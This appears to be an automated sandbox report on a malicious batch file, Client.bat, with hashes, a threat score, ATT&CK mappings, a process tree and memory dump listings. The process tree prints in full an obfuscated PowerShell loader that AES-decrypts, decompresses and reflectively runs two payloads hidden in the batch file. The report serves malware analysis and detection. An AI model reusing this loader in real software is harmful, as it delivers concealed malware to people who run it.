8ef692bc1808ce731aebee08f730c9d0a5b6d4695dafab2d420201247f717fc8

General

Target

Client.bat
Size

286KB
MD5

63c935a02276c2876f0f40f6ca93de5b
SHA1

06f5951a19367f0d348c0ba4055b42aa2ffcc724
SHA256

8ef692bc1808ce731aebee08f730c9d0a5b6d4695dafab2d420201247f717fc8
SHA512

be0cc7ac331c5613cb567749e0d1b76730620fbb6440a9a2a4a4bfdc719fdd49e466b2685fe0133e77e794f1c49bf7cdcca391e564b3ca8979c5ed6529adae79
SSDEEP

6144:P2xqkImYc6Cyaf3OXrio+jPv1Ra4LfIb55oXNs7attGR9:+qgVylXrio+Tt4rN5ci7a2R9

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2004	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2004	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2004	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 3024 wrote to memory of 1664	3024	cmd.exe	29
PID 3024 wrote to memory of 1664	3024	cmd.exe	29
PID 3024 wrote to memory of 1664	3024	cmd.exe	29
PID 1664 wrote to memory of 1856	1664	net.exe	30
PID 1664 wrote to memory of 1856	1664	net.exe	30
PID 1664 wrote to memory of 1856	1664	net.exe	30
PID 3024 wrote to memory of 2380	3024	cmd.exe	31
PID 3024 wrote to memory of 2380	3024	cmd.exe	31
PID 3024 wrote to memory of 2380	3024	cmd.exe	31
PID 3024 wrote to memory of 2004	3024	cmd.exe	32
PID 3024 wrote to memory of 2004	3024	cmd.exe	32
PID 3024 wrote to memory of 2004	3024	cmd.exe	32

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Client.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3024
- C:\Windows\system32\net.exe
  net file
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1664
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:1856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vUD33ojbuK5qcJP0aHOsz+UQ2Xco8FPhu/tJAikRbUw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ezvKJ197aUaeoNaZ7EnUWg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $nXpVF=New-Object System.IO.MemoryStream(,$param_var); $cpMTV=New-Object System.IO.MemoryStream; $CTTbn=New-Object System.IO.Compression.GZipStream($nXpVF, [IO.Compression.CompressionMode]::Decompress); $CTTbn.CopyTo($cpMTV); $CTTbn.Dispose(); $nXpVF.Dispose(); $cpMTV.Dispose(); $cpMTV.ToArray();}function execute_function($param_var,$param2_var){ $joTzJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUNvT=$joTzJ.EntryPoint; $rUNvT.Invoke($null, $param2_var);}$roMlk = 'C:\Users\Admin\AppData\Local\Temp\Client.bat';$host.UI.RawUI.WindowTitle = $roMlk;$vrXeC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($roMlk).Split([Environment]::NewLine);foreach ($iHPLf in $vrXeC) { if ($iHPLf.StartsWith('OMbuGMngZwfFIXvfXjdn')) { $uKYUX=$iHPLf.Substring(20); break; }}$payloads_var=[string[]]$uKYUX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
  2⤵
  PID:2380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2004

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2004-4-0x000007FEF5FEE000-0x000007FEF5FEF000-memory.dmp

Filesize
4KB

Download
memory/2004-5-0x000000001B610000-0x000000001B8F2000-memory.dmp

Filesize
2.9MB

Download
memory/2004-6-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

Filesize
9.6MB

Download
memory/2004-8-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

Filesize
9.6MB

Download
memory/2004-10-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

Filesize
9.6MB

Download
memory/2004-9-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

Filesize
9.6MB

Download
memory/2004-7-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/2004-11-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

Filesize
9.6MB

Download
memory/2004-12-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing